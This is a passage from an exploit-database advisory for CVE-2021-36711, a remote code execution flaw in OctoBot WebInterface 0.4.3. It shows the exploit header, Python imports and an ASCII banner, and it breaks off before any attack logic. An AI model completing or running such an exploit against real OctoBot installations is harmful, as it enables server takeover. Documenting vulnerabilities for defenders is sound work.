Authored by Samy Younsi, Thomas Knudsen

OctoBot WebInterface version 0.4.3 suffers from a remote code execution vulnerability.

advisories | CVE-2021-36711

# Exploit Title: OctoBot WebInterface 0.4.3 - Remote Code Execution (RCE)
# Date: 9/2/2021
# Exploit Author: Samy Younsi, Thomas Knudsen
# Vendor Homepage: https://www.octobot.online/
# Software Link: https://github.com/Drakkar-Software/OctoBot
# Version: 0.4.0beta3 - 0.4.3
# Tested on: Linux (Ubuntu, CentOS)
# CVE : CVE-2021-36711

from __future__ import print_function, unicode_literals
from bs4 import BeautifulSoup
import argparse
import requests
import zipfile
import time
import sys
import os

def banner():
    sashimiLogo = """
_________ . .
(.. _ , | /|
O /| / /
______ / | /
vvvv | / |
_ _ _ _ ^^^^ == _/ |
| | __ _ | || |__ (_)_ __ ___ (_)`_ === . |
/ __)/ _` / __| '_ | | '_ ` _ | |/ /_ / |
__ | (_| __ | | | | | | | | | | ||/ _ | /
( /__,_( |_| |_|_|_| |_| |_|_| ________/
|_| |_|